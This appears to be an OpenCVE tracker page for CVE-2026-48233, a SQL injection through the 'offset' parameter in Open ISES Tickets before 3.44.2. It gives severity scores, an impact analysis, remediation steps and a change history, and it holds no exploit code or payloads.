Description
Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/sit_incidents.php where the offset GET parameter is concatenated into the LIMIT clause of a SELECT statement without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents.
Published: 2026-05-21
Score: 7.1 High
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Open ISES Tickets versions prior to 3.44.2 contain a SQL injection flaw in the ajax/sit_incidents.php script, where the GET parameter "offset" is concatenated directly into the LIMIT clause of a SELECT statement without any sanitization. Exploitation allows an authenticated attacker to alter the semantics of the database query, enabling read, write, or destructive operations against the application's database, thereby compromising confidentiality, integrity, and potentially availability.

Affected Systems

The affected product is Open ISES Tickets. All installations running a version earlier than 3.44.2 are vulnerable. No specific minor version details are enumerated beyond the stated cutoff.

Risk and Exploitability

The CVSS score of 7.1 indicates a high severity. EPSS data is not available, so the current probability of exploitation is unknown, and the vulnerability is not listed in the CISA KEV catalog. Exposure requires authentication to the application, limiting the attack surface to legitimate users; an authenticated user could execute arbitrary SQL via crafted requests to the vulnerable endpoint.

Generated by OpenCVE AI on May 21, 2026 at 18:50 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Open ISES Tickets to version 3.44.2 or later.
  • Restrict the ajax/sit_incidents.php endpoint so that only authorized administrators can access it, or disable the offset functionality entirely if not needed.
  • Deploy a web‑application firewall or input‑validation rule that blocks or sanitizes malicious queries targeting the offset parameter.

Generated by OpenCVE AI on May 21, 2026 at 18:50 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Thu, 21 May 2026 18:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Thu, 21 May 2026 17:45:00 +0000

Type Values Removed Values Added
Description Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/sit_incidents.php where the offset GET parameter is concatenated into the LIMIT clause of a SELECT statement without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents.
Title Open ISES Tickets < 3.44.2 SQL Injection via ajax/sit_incidents.php offset Parameter
Weaknesses CWE-89
References
Metrics cvssV3_1

{'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N'}

cvssV4_0

{'score': 7.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N'}

Subscriptions

No data.

cve-icon MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-05-21T17:48:04.357Z

Reserved: 2026-05-21T13:15:18.101Z

Link: CVE-2026-48233

cve-icon Vulnrichment

Updated: 2026-05-21T17:48:00.434Z

cve-icon NVD

Status : Deferred

Published: 2026-05-21T18:16:20.050

Modified: 2026-05-21T19:10:12.323

Link: CVE-2026-48233

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-21T19:00:14Z

Weaknesses